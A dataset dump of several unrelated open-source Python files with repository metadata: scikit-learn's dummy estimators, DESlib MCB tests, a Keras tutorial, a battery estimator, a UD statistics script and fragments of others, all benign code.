text = re.sub(r'&(?!amp|gt|lt|apos|quot)', r'', text)
# fix 'abc <p="foo"/>' style tags - now <wf pos="foo">abc</wf>
text = re.sub(r'[ \t]*([^<>\s]+?)[ \t]*<p="([^"]*"?)"/>',
r' <wf pos="\2">\1</wf>', text)
text = re.sub(r'\s*"\s*<p=\'"\'/>', " <wf pos='\"'>\"</wf>", text)
return text
| 39.69802
| 79
| 0.509914
|
40b1b5e9b413934848b6a1a2dbe2f3280fee6a35
| 1,984
|
py
|
Python
|
battery/batteryestimator.py
|
zoltantorok/solaredge
|
673fc87896be70cf7f63f63be1e2049b1b8d0de3
|
[
"MIT"
] | 1
|
2020-04-18T05:43:49.000Z
|
2020-04-18T05:43:49.000Z
|
battery/batteryestimator.py
|
zoltantorok/solaredge
|
673fc87896be70cf7f63f63be1e2049b1b8d0de3
|
[
"MIT"
] | null | null | null |
battery/batteryestimator.py
|
zoltantorok/solaredge
|
673fc87896be70cf7f63f63be1e2049b1b8d0de3
|
[
"MIT"
] | null | null | null |
'''
Created on 29.10.2019
@author: Zoli
'''
class BatteryEstimator(object):
'''
classdocs
'''
def __init__(self, battery):
'''
Constructor
'''
self.battery = battery
def accumulateFeedInEnergy(self, energy, energyTypes):
'''
Accumulate energy fed into the electricity grid and thereby reduce the purchased energy, once the consumed energy exceeds the produced one
energy: detailed energy measurements (Wh). Data type: dictionary (key: datetime, value: tuple of 6 - see energyTypes)
energyTypes: type of energy stored in energy tuple
batteryCapacity: (Wh)
'''
accumulatedEnergy = {}
timestamps = list(energy.keys())
for timestamp in timestamps:
value = energy[timestamp]
consumption = value[energyTypes.index('Consumption')]
production = value[energyTypes.index('Production')]
oldBatteryEnergy = self.battery.energy
returnedEnergy = self.battery.chargeDischargeBattery(production - consumption)
if returnedEnergy >= 0:
feedIn = returnedEnergy
purchased = 0
else:
feedIn = 0
purchased = -returnedEnergy
selfConsumption = consumption + returnedEnergy - feedIn
valueList = list(value)
valueList[energyTypes.index('FeedIn')] = feedIn
valueList[energyTypes.index('Purchased')] = purchased
valueList[energyTypes.index('SelfConsumption')] = selfConsumption
valueList[energyTypes.index('Accumulated')] = self.battery.energy - oldBatteryEnergy
accumulatedEnergy[timestamp] = tuple(valueList)
return accumulatedEnergy
| 30.060606
| 146
| 0.558468
|
f2e193cf858b8a2abe9dd33769ab88a7b497ef63
| 22,384
|
py
|
Python
|
venv/Lib/site-packages/sklearn/dummy.py
|
OliviaNabbosa89/Disaster_Responses
|
1e66d77c303cec685dfc2ca94f4fca4cc9400570
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/sklearn/dummy.py
|
OliviaNabbosa89/Disaster_Responses
|
1e66d77c303cec685dfc2ca94f4fca4cc9400570
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/sklearn/dummy.py
|
OliviaNabbosa89/Disaster_Responses
|
1e66d77c303cec685dfc2ca94f4fca4cc9400570
|
[
"MIT"
] | null | null | null |
# Author: Mathieu Blondel <mathieu@mblondel.org>
# Arnaud Joly <a.joly@ulg.ac.be>
# Maheshakya Wijewardena <maheshakya.10@cse.mrt.ac.lk>
# License: BSD 3 clause
import warnings
import numpy as np
import scipy.sparse as sp
from .base import BaseEstimator, ClassifierMixin, RegressorMixin
from .base import MultiOutputMixin
from .utils import check_random_state
from .utils.validation import _num_samples
from .utils.validation import check_array
from .utils.validation import check_consistent_length
from .utils.validation import check_is_fitted, _check_sample_weight
from .utils.random import _random_choice_csc
from .utils.stats import _weighted_percentile
from .utils.multiclass import class_distribution
from .utils.validation import _deprecate_positional_args
class DummyClassifier(MultiOutputMixin, ClassifierMixin, BaseEstimator):
"""
DummyClassifier is a classifier that makes predictions using simple rules.
This classifier is useful as a simple baseline to compare with other
(real) classifiers. Do not use it for real problems.
Read more in the :ref:`User Guide <dummy_estimators>`.
.. versionadded:: 0.13
Parameters
----------
strategy : {"stratified", "most_frequent", "prior", "uniform", \
"constant"}, default="prior"
Strategy to use to generate predictions.
* "stratified": generates predictions by respecting the training
set's class distribution.
* "most_frequent": always predicts the most frequent label in the
training set.
* "prior": always predicts the class that maximizes the class prior
(like "most_frequent") and ``predict_proba`` returns the class prior.
* "uniform": generates predictions uniformly at random.
* "constant": always predicts a constant label that is provided by
the user. This is useful for metrics that evaluate a non-majority
class
.. versionchanged:: 0.24
The default value of `strategy` has changed to "prior" in version
0.24.
random_state : int, RandomState instance or None, default=None
Controls the randomness to generate the predictions when
``strategy='stratified'`` or ``strategy='uniform'``.
Pass an int for reproducible output across multiple function calls.
See :term:`Glossary <random_state>`.
constant : int or str or array-like of shape (n_outputs,)
The explicit constant as predicted by the "constant" strategy. This
parameter is useful only for the "constant" strategy.
Attributes
----------
classes_ : ndarray of shape (n_classes,) or list of such arrays
Class labels for each output.
n_classes_ : int or list of int
Number of label for each output.
class_prior_ : ndarray of shape (n_classes,) or list of such arrays
Probability of each class for each output.
n_outputs_ : int
Number of outputs.
sparse_output_ : bool
True if the array returned from predict is to be in sparse CSC format.
Is automatically set to True if the input y is passed in sparse format.
Examples
--------
>>> import numpy as np
>>> from sklearn.dummy import DummyClassifier
>>> X = np.array([-1, 1, 1, 1])
>>> y = np.array([0, 1, 1, 1])
>>> dummy_clf = DummyClassifier(strategy="most_frequent")
>>> dummy_clf.fit(X, y)
DummyClassifier(strategy='most_frequent')
>>> dummy_clf.predict(X)
array([1, 1, 1, 1])
>>> dummy_clf.score(X, y)
0.75
"""
@_deprecate_positional_args
def __init__(self, *, strategy="prior", random_state=None,
constant=None):
self.strategy = strategy
self.random_state = random_state
self.constant = constant
def fit(self, X, y, sample_weight=None):
"""Fit the random classifier.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Training data.
y : array-like of shape (n_samples,) or (n_samples, n_outputs)
Target values.
sample_weight : array-like of shape (n_samples,), default=None
Sample weights.
Returns
-------
self : object
"""
allowed_strategies = ("most_frequent", "stratified", "uniform",
"constant", "prior")
if self.strategy not in allowed_strategies:
raise ValueError("Unknown strategy type: %s, expected one of %s."
% (self.strategy, allowed_strategies))
self._strategy = self.strategy
if self._strategy == "uniform" and sp.issparse(y):
y = y.toarray()
warnings.warn('A local copy of the target data has been converted '
'to a numpy array. Predicting on sparse target data '
'with the uniform strategy would not save memory '
'and would be slower.',
UserWarning)
self.sparse_output_ = sp.issparse(y)
if not self.sparse_output_:
y = np.asarray(y)
y = np.atleast_1d(y)
if y.ndim == 1:
y = np.reshape(y, (-1, 1))
self.n_outputs_ = y.shape[1]
self.n_features_in_ = None # No input validation is done for X
check_consistent_length(X, y)
if sample_weight is not None:
sample_weight = _check_sample_weight(sample_weight, X)
if self._strategy == "constant":
if self.constant is None:
raise ValueError("Constant target value has to be specified "
"when the constant strategy is used.")
else:
constant = np.reshape(np.atleast_1d(self.constant), (-1, 1))
if constant.shape[0] != self.n_outputs_:
raise ValueError("Constant target value should have "
"shape (%d, 1)." % self.n_outputs_)
(self.classes_,
self.n_classes_,
self.class_prior_) = class_distribution(y, sample_weight)
if self._strategy == "constant":
for k in range(self.n_outputs_):
if not any(constant[k][0] == c for c in self.classes_[k]):
# Checking in case of constant strategy if the constant
# provided by the user is in y.
err_msg = ("The constant target value must be present in "
"the training data. You provided constant={}. "
"Possible values are: {}."
.format(self.constant, list(self.classes_[k])))
raise ValueError(err_msg)
if self.n_outputs_ == 1:
self.n_classes_ = self.n_classes_[0]
self.classes_ = self.classes_[0]
self.class_prior_ = self.class_prior_[0]
return self
def predict(self, X):
"""Perform classification on test vectors X.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Test data.
Returns
-------
y : array-like of shape (n_samples,) or (n_samples, n_outputs)
Predicted target values for X.
"""
check_is_fitted(self)
# numpy random_state expects Python int and not long as size argument
# under Windows
n_samples = _num_samples(X)
rs = check_random_state(self.random_state)
n_classes_ = self.n_classes_
classes_ = self.classes_
class_prior_ = self.class_prior_
constant = self.constant
if self.n_outputs_ == 1:
# Get same type even for self.n_outputs_ == 1
n_classes_ = [n_classes_]
classes_ = [classes_]
class_prior_ = [class_prior_]
constant = [constant]
# Compute probability only once
if self._strategy == "stratified":
proba = self.predict_proba(X)
if self.n_outputs_ == 1:
proba = [proba]
if self.sparse_output_:
class_prob = None
if self._strategy in ("most_frequent", "prior"):
classes_ = [np.array([cp.argmax()]) for cp in class_prior_]
elif self._strategy == "stratified":
class_prob = class_prior_
elif self._strategy == "uniform":
raise ValueError("Sparse target prediction is not "
"supported with the uniform strategy")
elif self._strategy == "constant":
classes_ = [np.array([c]) for c in constant]
y = _random_choice_csc(n_samples, classes_, class_prob,
self.random_state)
else:
if self._strategy in ("most_frequent", "prior"):
y = np.tile([classes_[k][class_prior_[k].argmax()] for
k in range(self.n_outputs_)], [n_samples, 1])
elif self._strategy == "stratified":
y = np.vstack([classes_[k][proba[k].argmax(axis=1)] for
k in range(self.n_outputs_)]).T
elif self._strategy == "uniform":
ret = [classes_[k][rs.randint(n_classes_[k], size=n_samples)]
for k in range(self.n_outputs_)]
y = np.vstack(ret).T
elif self._strategy == "constant":
y = np.tile(self.constant, (n_samples, 1))
if self.n_outputs_ == 1:
y = np.ravel(y)
return y
def predict_proba(self, X):
"""
Return probability estimates for the test vectors X.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Test data.
Returns
-------
P : ndarray of shape (n_samples, n_classes) or list of such arrays
Returns the probability of the sample for each class in
the model, where classes are ordered arithmetically, for each
output.
"""
check_is_fitted(self)
# numpy random_state expects Python int and not long as size argument
# under Windows
n_samples = _num_samples(X)
rs = check_random_state(self.random_state)
n_classes_ = self.n_classes_
classes_ = self.classes_
class_prior_ = self.class_prior_
constant = self.constant
if self.n_outputs_ == 1:
# Get same type even for self.n_outputs_ == 1
n_classes_ = [n_classes_]
classes_ = [classes_]
class_prior_ = [class_prior_]
constant = [constant]
P = []
for k in range(self.n_outputs_):
if self._strategy == "most_frequent":
ind = class_prior_[k].argmax()
out = np.zeros((n_samples, n_classes_[k]), dtype=np.float64)
out[:, ind] = 1.0
elif self._strategy == "prior":
out = np.ones((n_samples, 1)) * class_prior_[k]
elif self._strategy == "stratified":
out = rs.multinomial(1, class_prior_[k], size=n_samples)
out = out.astype(np.float64)
elif self._strategy == "uniform":
out = np.ones((n_samples, n_classes_[k]), dtype=np.float64)
out /= n_classes_[k]
elif self._strategy == "constant":
ind = np.where(classes_[k] == constant[k])
out = np.zeros((n_samples, n_classes_[k]), dtype=np.float64)
out[:, ind] = 1.0
P.append(out)
if self.n_outputs_ == 1:
P = P[0]
return P
def predict_log_proba(self, X):
"""
Return log probability estimates for the test vectors X.
Parameters
----------
X : {array-like, object with finite length or shape}
Training data, requires length = n_samples
Returns
-------
P : ndarray of shape (n_samples, n_classes) or list of such arrays
Returns the log probability of the sample for each class in
the model, where classes are ordered arithmetically for each
output.
"""
proba = self.predict_proba(X)
if self.n_outputs_ == 1:
return np.log(proba)
else:
return [np.log(p) for p in proba]
def _more_tags(self):
return {
'poor_score': True, 'no_validation': True,
'_xfail_checks': {
'check_methods_subset_invariance':
'fails for the predict method',
'check_methods_sample_order_invariance':
'fails for the predict method'
}
}
def score(self, X, y, sample_weight=None):
"""Returns the mean accuracy on the given test data and labels.
In multi-label classification, this is the subset accuracy
which is a harsh metric since you require for each sample that
each label set be correctly predicted.
Parameters
----------
X : None or array-like of shape (n_samples, n_features)
Test samples. Passing None as test samples gives the same result
as passing real test samples, since DummyClassifier
operates independently of the sampled observations.
y : array-like of shape (n_samples,) or (n_samples, n_outputs)
True labels for X.
sample_weight : array-like of shape (n_samples,), default=None
Sample weights.
Returns
-------
score : float
Mean accuracy of self.predict(X) wrt. y.
"""
if X is None:
X = np.zeros(shape=(len(y), 1))
return super().score(X, y, sample_weight)
class DummyRegressor(MultiOutputMixin, RegressorMixin, BaseEstimator):
"""
DummyRegressor is a regressor that makes predictions using
simple rules.
This regressor is useful as a simple baseline to compare with other
(real) regressors. Do not use it for real problems.
Read more in the :ref:`User Guide <dummy_estimators>`.
.. versionadded:: 0.13
Parameters
----------
strategy : {"mean", "median", "quantile", "constant"}, default="mean"
Strategy to use to generate predictions.
* "mean": always predicts the mean of the training set
* "median": always predicts the median of the training set
* "quantile": always predicts a specified quantile of the training set,
provided with the quantile parameter.
* "constant": always predicts a constant value that is provided by
the user.
constant : int or float or array-like of shape (n_outputs,), default=None
The explicit constant as predicted by the "constant" strategy. This
parameter is useful only for the "constant" strategy.
quantile : float in [0.0, 1.0], default=None
The quantile to predict using the "quantile" strategy. A quantile of
0.5 corresponds to the median, while 0.0 to the minimum and 1.0 to the
maximum.
Attributes
----------
constant_ : ndarray of shape (1, n_outputs)
Mean or median or quantile of the training targets or constant value
given by the user.
n_outputs_ : int
Number of outputs.
Examples
--------
>>> import numpy as np
>>> from sklearn.dummy import DummyRegressor
>>> X = np.array([1.0, 2.0, 3.0, 4.0])
>>> y = np.array([2.0, 3.0, 5.0, 10.0])
>>> dummy_regr = DummyRegressor(strategy="mean")
>>> dummy_regr.fit(X, y)
DummyRegressor()
>>> dummy_regr.predict(X)
array([5., 5., 5., 5.])
>>> dummy_regr.score(X, y)
0.0
"""
@_deprecate_positional_args
def __init__(self, *, strategy="mean", constant=None, quantile=None):
self.strategy = strategy
self.constant = constant
self.quantile = quantile
def fit(self, X, y, sample_weight=None):
"""Fit the random regressor.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Training data.
y : array-like of shape (n_samples,) or (n_samples, n_outputs)
Target values.
sample_weight : array-like of shape (n_samples,), default=None
Sample weights.
Returns
-------
self : object
"""
allowed_strategies = ("mean", "median", "quantile", "constant")
if self.strategy not in allowed_strategies:
raise ValueError("Unknown strategy type: %s, expected one of %s."
% (self.strategy, allowed_strategies))
y = check_array(y, ensure_2d=False)
self.n_features_in_ = None # No input validation is done for X
if len(y) == 0:
raise ValueError("y must not be empty.")
if y.ndim == 1:
y = np.reshape(y, (-1, 1))
self.n_outputs_ = y.shape[1]
check_consistent_length(X, y, sample_weight)
if sample_weight is not None:
sample_weight = _check_sample_weight(sample_weight, X)
if self.strategy == "mean":
self.constant_ = np.average(y, axis=0, weights=sample_weight)
elif self.strategy == "median":
if sample_weight is None:
self.constant_ = np.median(y, axis=0)
else:
self.constant_ = [_weighted_percentile(y[:, k], sample_weight,
percentile=50.)
for k in range(self.n_outputs_)]
elif self.strategy == "quantile":
if self.quantile is None or not np.isscalar(self.quantile):
raise ValueError("Quantile must be a scalar in the range "
"[0.0, 1.0], but got %s." % self.quantile)
percentile = self.quantile * 100.0
if sample_weight is None:
self.constant_ = np.percentile(y, axis=0, q=percentile)
else:
self.constant_ = [_weighted_percentile(y[:, k], sample_weight,
percentile=percentile)
for k in range(self.n_outputs_)]
elif self.strategy == "constant":
if self.constant is None:
raise TypeError("Constant target value has to be specified "
"when the constant strategy is used.")
self.constant = check_array(self.constant,
accept_sparse=['csr', 'csc', 'coo'],
ensure_2d=False, ensure_min_samples=0)
if self.n_outputs_ != 1 and self.constant.shape[0] != y.shape[1]:
raise ValueError(
"Constant target value should have "
"shape (%d, 1)." % y.shape[1])
self.constant_ = self.constant
self.constant_ = np.reshape(self.constant_, (1, -1))
return self
def predict(self, X, return_std=False):
"""
Perform classification on test vectors X.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Test data.
return_std : bool, default=False
Whether to return the standard deviation of posterior prediction.
All zeros in this case.
.. versionadded:: 0.20
Returns
-------
y : array-like of shape (n_samples,) or (n_samples, n_outputs)
Predicted target values for X.
y_std : array-like of shape (n_samples,) or (n_samples, n_outputs)
Standard deviation of predictive distribution of query points.
"""
check_is_fitted(self)
n_samples = _num_samples(X)
y = np.full((n_samples, self.n_outputs_), self.constant_,
dtype=np.array(self.constant_).dtype)
y_std = np.zeros((n_samples, self.n_outputs_))
if self.n_outputs_ == 1:
y = np.ravel(y)
y_std = np.ravel(y_std)
return (y, y_std) if return_std else y
def _more_tags(self):
return {'poor_score': True, 'no_validation': True}
def score(self, X, y, sample_weight=None):
"""Returns the coefficient of determination R^2 of the prediction.
The coefficient R^2 is defined as (1 - u/v), where u is the residual
sum of squares ((y_true - y_pred) ** 2).sum() and v is the total
sum of squares ((y_true - y_true.mean()) ** 2).sum().
The best possible score is 1.0 and it can be negative (because the
model can be arbitrarily worse). A constant model that always
predicts the expected value of y, disregarding the input features,
would get a R^2 score of 0.0.
Parameters
----------
X : None or array-like of shape (n_samples, n_features)
Test samples. Passing None as test samples gives the same result
as passing real test samples, since DummyRegressor
operates independently of the sampled observations.
y : array-like of shape (n_samples,) or (n_samples, n_outputs)
True values for X.
sample_weight : array-like of shape (n_samples,), default=None
Sample weights.
Returns
-------
score : float
R^2 of self.predict(X) wrt. y.
"""
if X is None:
X = np.zeros(shape=(len(y), 1))
return super().score(X, y, sample_weight)
| 37.059603
| 80
| 0.55973
|
f8cb5b3354a489560ff3e30d1a77f32bcea571a9
| 23
|
py
|
Python
|
cycontext/_version.py
|
medspacy/cycontext
|
791f14bc611b20b59833b406e5106d6fe014830d
|
[
"MIT"
] | 6
|
2020-05-08T20:04:31.000Z
|
2021-04-29T13:24:34.000Z
|
cycontext/_version.py
|
medspacy/cycontext
|
791f14bc611b20b59833b406e5106d6fe014830d
|
[
"MIT"
] | 7
|
2020-03-19T15:58:27.000Z
|
2020-10-06T21:56:24.000Z
|
cycontext/_version.py
|
medspacy/cycontext
|
791f14bc611b20b59833b406e5106d6fe014830d
|
[
"MIT"
] | 2
|
2020-04-26T00:51:43.000Z
|
2020-07-09T18:30:53.000Z
|
__version__ = '1.0.3.3'
| 23
| 23
| 0.652174
|
6be09ef9a92e8f214574be637a297138a85bd1e1
| 1,103
|
py
|
Python
|
6_google_trace/ann/keras_first_network.py
|
nguyenthieu95/machine_learning
|
40595a003815445a7a9fef7e8925f71d19f8fa30
|
[
"MIT"
] | 1
|
2017-12-30T20:10:07.000Z
|
2017-12-30T20:10:07.000Z
|
6_google_trace/ann/keras_first_network.py
|
ThieuNv/machine_learning
|
40595a003815445a7a9fef7e8925f71d19f8fa30
|
[
"MIT"
] | null | null | null |
6_google_trace/ann/keras_first_network.py
|
ThieuNv/machine_learning
|
40595a003815445a7a9fef7e8925f71d19f8fa30
|
[
"MIT"
] | 1
|
2019-12-23T15:30:16.000Z
|
2019-12-23T15:30:16.000Z
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Fri Nov 17 09:33:25 2017
@author: thieunv
keras_first_network.py
"""
from keras.models import Sequential
from keras.layers import Dense
import numpy
# fix random seed for reproducibility
numpy.random.seed(7)
# load pima indians dataset
dataset = numpy.loadtxt("pima-indians-diabetes.csv", delimiter=",")
# split into input (X) and output (Y) variables
X = dataset[:,0:8]
Y = dataset[:,8]
# create model
model = Sequential()
model.add(Dense(12, input_dim=8, activation='relu')) # 12 neuron and 8 input vari
model.add(Dense(8, activation='relu')) # 8 neuron
model.add(Dense(1, activation='sigmoid')) # 1 neuron
# Compile model
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
# Fit the model
model.fit(X, Y, epochs=150, batch_size=10)
# evaluate the model
scores = model.evaluate(X, Y)
print("\n%s: %.2f%%" % (model.metrics_names[1], scores[1]*100))
# calculate predictions
predictions = model.predict(X)
# round predictions
rounded = [round(x[0]) for x in predictions]
print(rounded)
| 23.468085
| 85
| 0.708069
|
90ef1f7b80198de847ff458ae8af12366f12c532
| 41
|
py
|
Python
|
utils/mappings/__init__.py
|
SoulSen/CTSearcher
|
23f7fdef97f51e3f4592b92a2d3b1c365c0f547d
|
[
"MIT"
] | null | null | null |
utils/mappings/__init__.py
|
SoulSen/CTSearcher
|
23f7fdef97f51e3f4592b92a2d3b1c365c0f547d
|
[
"MIT"
] | null | null | null |
utils/mappings/__init__.py
|
SoulSen/CTSearcher
|
23f7fdef97f51e3f4592b92a2d3b1c365c0f547d
|
[
"MIT"
] | null | null | null |
from .MappingViewer import MappingViewer
| 20.5
| 40
| 0.878049
|
f39c53e1265eb41535b088b1d9958c37721b1521
| 5,089
|
py
|
Python
|
deslib/tests/dcs/test_mcb.py
|
Autumnn/DESlib
|
1dd461e6ac2bf55760751fa4e158a4113344b278
|
[
"BSD-3-Clause"
] | null | null | null |
deslib/tests/dcs/test_mcb.py
|
Autumnn/DESlib
|
1dd461e6ac2bf55760751fa4e158a4113344b278
|
[
"BSD-3-Clause"
] | null | null | null |
deslib/tests/dcs/test_mcb.py
|
Autumnn/DESlib
|
1dd461e6ac2bf55760751fa4e158a4113344b278
|
[
"BSD-3-Clause"
] | null | null | null |
import pytest
from sklearn.linear_model import Perceptron
from deslib.dcs.mcb import MCB
from deslib.tests.examples_test import *
# ex1 the similarity will always be 100%
bks_dsel_ex1 = np.hstack((np.hstack((np.zeros((15, 1)), np.ones((15, 1)))), np.zeros((15, 1))))
# Change a bit to check if the filtering by similarity is working as intended.
bks_dsel_ex2 = np.hstack((np.hstack((np.zeros((15, 1)), np.ones((15, 1)))), np.zeros((15, 1))))
bks_dsel_ex2[1, :] = 2
bks_dsel_ex3 = bks_dsel_ex1 + 1
@pytest.mark.parametrize('similarity_threshold', [2.0, -1.0, -0.5])
def test_similarity_threshold(similarity_threshold):
with pytest.raises(ValueError):
MCB(create_pool_classifiers(), similarity_threshold=similarity_threshold)
@pytest.mark.parametrize('similarity_threshold', [None, 'a'])
def test_similarity_threshold_type(similarity_threshold):
with pytest.raises(TypeError):
MCB(create_pool_classifiers(), similarity_threshold=similarity_threshold)
@pytest.mark.parametrize('index, expected', [(0, [0.57142857, 0.71428571, 0.71428571]),
(1, [0.71428571, 0.85714286, 0.71428571]),
(2, [0.57142857, 0.71428571, 0.57142857])])
def test_estimate_competence(index, expected):
query = np.atleast_2d([1, 1])
mcb_test = MCB(create_pool_classifiers())
mcb_test.processed_dsel = dsel_processed_ex1
mcb_test.neighbors = neighbors_ex1[index, :]
mcb_test.distances = distances_ex1[index, :]
mcb_test.DFP_mask = [1, 1, 1]
mcb_test.BKS_dsel = bks_dsel_ex1
predictions = []
for clf in mcb_test.pool_classifiers:
predictions.append(clf.predict(query)[0])
competences = mcb_test.estimate_competence(query, predictions=np.atleast_2d(predictions))
assert np.isclose(competences, expected).all()
# This second test case uses a different KS matrix to filter out some neighbors.
@pytest.mark.parametrize('index, expected', [(0, [0.66666666, 0.83333333, 0.66666666]),
(1, [0.83333333, 1.0, 0.66666666])])
def test_estimate_competence2(index, expected):
query = np.atleast_2d([1, 1])
mcb_test = MCB(create_pool_classifiers())
mcb_test.processed_dsel = dsel_processed_ex1
mcb_test.neighbors = neighbors_ex1[index, :]
mcb_test.distances = distances_ex1[index, :]
mcb_test.DFP_mask = [1, 1, 1]
# Only changing the pre-processed BKS to see if the filter works.
mcb_test.BKS_dsel = bks_dsel_ex2
predictions = []
for clf in mcb_test.pool_classifiers:
predictions.append(clf.predict(query)[0])
competences = mcb_test.estimate_competence(query, predictions=np.atleast_2d(predictions))
assert np.isclose(competences, expected).all()
# This third test uses an totally wrong bks matrix, so that the technique is obligated to use the whole
# region of competence
@pytest.mark.parametrize('index, expected', [(0, [0.57142857, 0.71428571, 0.71428571]),
(1, [0.71428571, 0.85714286, 0.71428571]),
(2, [0.57142857, 0.71428571, 0.57142857])])
def test_estimate_competence3(index, expected):
query = np.atleast_2d([1, 1])
mcb_test = MCB(create_pool_classifiers())
mcb_test.processed_dsel = dsel_processed_ex1
mcb_test.neighbors = neighbors_ex1[index, :]
mcb_test.distances = distances_ex1[index, :]
mcb_test.DFP_mask = [1, 1, 1]
# Only changing the pre-processed BKS to see if the filter works.
mcb_test.BKS_dsel = bks_dsel_ex3
predictions = []
for clf in mcb_test.pool_classifiers:
predictions.append(clf.predict(query)[0])
competences = mcb_test.estimate_competence(query, predictions=np.atleast_2d(predictions))
assert np.isclose(competences, expected).all()
def test_estimate_competence_batch():
query = np.ones((3, 2))
expected = np.array([[0.57142857, 0.71428571, 0.71428571],
[0.71428571, 0.85714286, 0.71428571],
[0.57142857, 0.71428571, 0.57142857]])
mcb_test = MCB(create_pool_classifiers())
mcb_test.processed_dsel = dsel_processed_ex1
mcb_test.neighbors = neighbors_ex1
mcb_test.distances = distances_ex1
mcb_test.DFP_mask = np.ones((3, 3))
# Only changing the pre-processed BKS to see if the filter works.
mcb_test.BKS_dsel = bks_dsel_ex3
predictions = []
for clf in mcb_test.pool_classifiers:
predictions.append(clf.predict(query)[0])
competences = mcb_test.estimate_competence(query, predictions=np.tile(predictions, (3, 1)))
assert np.isclose(competences, expected).all()
# Test if the class is raising an error when the base classifiers do not implements the predict_proba method.
# In this case the test should not raise an error since this class does not require base classifiers that
# can estimate probabilities
def test_predict_proba():
X = X_dsel_ex1
y = y_dsel_ex1
clf1 = Perceptron()
clf1.fit(X, y)
MCB([clf1, clf1])
| 40.712
| 109
| 0.683828
|
92019c04a196901100f4c287608f011b2e9edb8d
| 2,750
|
py
|
Python
|
bash/collect_stats_eud.py
|
coastalcph/HIT-SCIR-CoNLL2019
|
60258a81a2db91ca012be4486ea8475376756374
|
[
"Apache-2.0"
] | 5
|
2020-05-27T14:18:50.000Z
|
2021-05-28T05:07:19.000Z
|
bash/collect_stats_eud.py
|
coastalcph/HIT-SCIR-CoNLL2019
|
60258a81a2db91ca012be4486ea8475376756374
|
[
"Apache-2.0"
] | 1
|
2020-05-25T13:56:00.000Z
|
2020-05-25T13:56:00.000Z
|
bash/collect_stats_eud.py
|
coastalcph/HIT-SCIR-CoNLL2019
|
60258a81a2db91ca012be4486ea8475376756374
|
[
"Apache-2.0"
] | 1
|
2020-06-02T16:50:04.000Z
|
2020-06-02T16:50:04.000Z
|
import os,sys
#run:
# python collect_stats_eud.py data_dir
# where data dir contains the UD directory
eud_dir=sys.argv[1]
langs = os.listdir(eud_dir)
stats={}
bins = [(1,5),(5,10),(10,20), (20,50),(50,100),(100,500),(500,1000)]
bins_dict = {}
for abin in bins:
bins_dict[str(abin)] = list(range(abin[0],abin[1]))
bins_dict['1000+'] = []
for lang in langs:
if lang.endswith('PUD') or lang.endswith('FQB'):
continue
iso_cmd = f'ls {eud_dir}{lang}/*train.conllu'
iso = [line for line in os.popen(iso_cmd)][0].split("/")[6].split("-")[0]
stats[iso] = {'n_head':{},'labels':{}, 'label_freq':{}, 'binned_freq':{}}
for abin in bins_dict:
stats[iso]['binned_freq'][abin] = 0
trainfile = f'{eud_dir}{lang}/{iso}-ud-train.conllu'
with open(trainfile,'r') as tf:
for line in tf:
if line.startswith("#"):
continue
elif line == '\n':
continue
else:
eud = line.split('\t')[8]
all_heads = eud.split('|')
n_heads = len(all_heads)
if n_heads not in stats[iso]['n_head']:
stats[iso]['n_head'][n_heads] = 0
stats[iso]['n_head'][n_heads] += 1
for head in all_heads:
label = ''.join(head.partition(':')[2:])
if label not in stats[iso]['labels']:
stats[iso]['labels'][label] = 0
stats[iso]['labels'][label] +=1
for label in stats[iso]['labels']:
freq = stats[iso]['labels'][label]
if freq not in stats[iso]['label_freq']:
stats[iso]['label_freq'][freq] = 0
stats[iso]['label_freq'][freq] += 1
found_bin = False
for abin in bins_dict:
if freq in bins_dict[abin]:
stats[iso]['binned_freq'][abin] += 1
found_bin = True
if not found_bin:
stats[iso]['binned_freq']['1000+'] += 1
for iso in stats:
outfile = f'stats/{iso}.csv'
with open(outfile,'w') as out:
num_labels = len(stats[iso]['labels'])
out.write('labels \n')
line1 = f'number of labels\t{num_labels}\n'
out.write(line1)
out.write('binned label frequencies \n')
for abin, freq in stats[iso]['binned_freq'].items():
line = f'{abin}\t{freq}\n'
out.write(line)
max_heads = max(stats[iso]['n_head'])
out.write('\n heads \n')
line2 = f'max heads\t{max_heads}\n'
out.write(line2)
out.write('freq of head numbers \n')
for n_head, freq in sorted(stats[iso]['n_head'].items()):
line = f'{n_head}\t{freq}\n'
out.write(line)
| 35.714286
| 77
| 0.525091
|
ee4409881f109f2078c315f82a984364e2f71744
| 280
|
py
|
Python
|
src/main.py
|
JackEMiller/ClubForum
|
0ee68bb3aa453433f460257e07bfcf85f0f908de
|
[
"MIT"
] | null | null | null |
src/main.py
|
JackEMiller/ClubForum
|
0ee68bb3aa453433f460257e07bfcf85f0f908de
|
[
"MIT"
] | null | null | null |
src/main.py
|
JackEMiller/ClubForum
|
0ee68bb3aa453433f460257e07bfcf85f0f908de
|
[
"MIT"
] | null | null | null |
from models import create_app
try:
import views
except:
from src import views
app = create_app()
app.register_blueprint(views.app)
if __name__ == "__main__":
app = create_app()
app.register_blueprint(views.app)
app.run(host='0.0.0.0',port=5000,debug=True)
| 17.5
| 48
| 0.703571
|
d7ddeefe068337bfebf42642d4bfcd045ee1877d
| 1,409
|
py
|
Python
|
src/web/schools/migrations/0004_auto_20160508_1059.py
|
fossabot/SIStema
|
1427dda2082688a9482c117d0e24ad380fdc26a6
|
[
"MIT"
] | 5
|
2018-03-08T17:22:27.000Z
|
2018-03-11T14:20:53.000Z
|
src/web/schools/migrations/0004_auto_20160508_1059.py
|
fossabot/SIStema
|
1427dda2082688a9482c117d0e24ad380fdc26a6
|
[
"MIT"
] | 263
|
2018-03-08T18:05:12.000Z
|
2022-03-11T23:26:20.000Z
|
src/web/schools/migrations/0004_auto_20160508_1059.py
|
fossabot/SIStema
|
1427dda2082688a9482c117d0e24ad380fdc26a6
|
[
"MIT"
] | 6
|
2018-03-12T19:48:19.000Z
|
2022-01-14T04:58:52.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('schools', '0003_school_full_name'),
]
operations = [
migrations.CreateModel(
name='Parallel',
fields=[
('id', models.AutoField(primary_key=True, auto_created=True, verbose_name='ID', serialize=False)),
